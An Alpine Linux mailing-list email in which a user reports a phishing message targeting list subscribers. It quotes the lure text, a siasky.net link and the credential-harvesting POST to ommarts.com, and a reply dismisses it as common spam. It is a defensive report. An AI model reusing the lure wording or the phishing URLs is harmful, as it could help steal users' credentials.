Received: from out2.migadu.com (out2.migadu.com [188.165.223.204]) by nld3-dev1.alpinelinux.org (Postfix) with ESMTPS id 80794780778 for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 13:39:18 +0000 (UTC) Mime-Version: 1.0 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ayaya.dev; s=key1; t=1665236356; h=from:from:reply-to:subject:subject:date:date:message-id:message-id: to:to:cc:mime-version:mime-version:content-type:content-type: content-transfer-encoding:content-transfer-encoding: in-reply-to:in-reply-to:references:references; bh=UiC+d0rohcsYxF4bF5cr2i1gH/eujJEL6eL0DkJEReY=; b=QGadvYzEoJIqITbGQvVNV/oKhVwOIz77/+BuUmSBOpvV6qjf1ye/DKcEqlg1eBJfbd+F91 86caIOpNlp6CZ15oP9vCZ9sWhXVw5pl2tgXcsBRs7VnrKy0/bJZ5MKzOB7tGUYHM67gtid CZg7YNDXL7Q5ah3CMKHsoxACOVuT9e0= Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=UTF-8 Date: Sat, 08 Oct 2022 15:39:15 +0200 Message-Id: X-Report-Abuse: Please report any abuse attempt to abuse@migadu.com and include these headers. From: "alice" To: "Stefan Hartmann" , <~alpine/users@lists.alpinelinux.org> Subject: =?utf-8?q?Re:_Your_account_associated_with_your=C3=82_alpine-user@lists.a?= =?utf-8?q?lpinelinux.org_has_been_limited_Reason_...?= References: <3530b06a-bf3b-a3ef-ecce-1162bea953df@hafenthal.de> In-Reply-To: <3530b06a-bf3b-a3ef-ecce-1162bea953df@hafenthal.de> X-Migadu-Flow: FLOW_OUT On Sat Oct 8, 2022 at 2:03 PM CEST, Stefan Hartmann wrote: > Hello, > > yesterday I received a suspicious email from alpinelinux.org: > > "Notification > Dear alpine-user,Your account associated with your=C3=82=20 > alpine-user@lists.alpinelinux.org has been limitedReason: Messages -=20 > Delivery Process Failed . > What happens when new messages are inaccessible? > Once a new message is limited, it will be inaccessible=C3=A2=E2=82=AC=E2= =80=9Dusers will not=20 > be able to=C3=82 receive new messages. > Want to keep the account and receive new messages? > ..." > > There is a pushbutton which yields to=20 > https://siasky.net/EABzry9_94YhAghJPa5QmmPjGdw01d_BAgdPmQJCkk0vlA#alpine-= user@lists.alpinelinux.org > > I analyzed this with burp: > The pushbutton makes a post > > POST //img/Jesse.php HTTP/1.1 > > Host: ommarts.com > > ... > email=3Dalpine-user%40lists.alpinelinux.org&password=3Dspearphising%3F > > It returns a 200 OK. > > Uses alpinelinux.org really the php-script > http://ommarts.com//img/Jesse.php ??? > > Suspicious! > > The messages comes from > ... > Received: from nld3-dev1.alpinelinux.org (nld3-dev1.alpinelinux.org=20 > [147.75.101.119]) > by gw1.hafenthal.de (Postfix) with ESMTPS id 0D51BA80B87 > for ; Fri, 7 Oct 2022 20:24:23 +0000 (UTC) > ... > which seams OK. > Nb. received on a Alpinelinux mailrelay! > > Was there a breach? if you're referring to: https://lists.alpinelinux.org/~alpine/devel/%3C7e33418c8ccc805ee91c2176c296= 0a5a%4admin.reservasmi2u.mx%3E then this is just random spam sent to the mailing list, without even a spoofed From:. though it does look quite believable :) (i personally see these like ~12 times a week with all the mailing lists i'm subsribed to, so i didn't think anything of it) > > --=20 > Stefan Hartmann - ib.hafenthal.de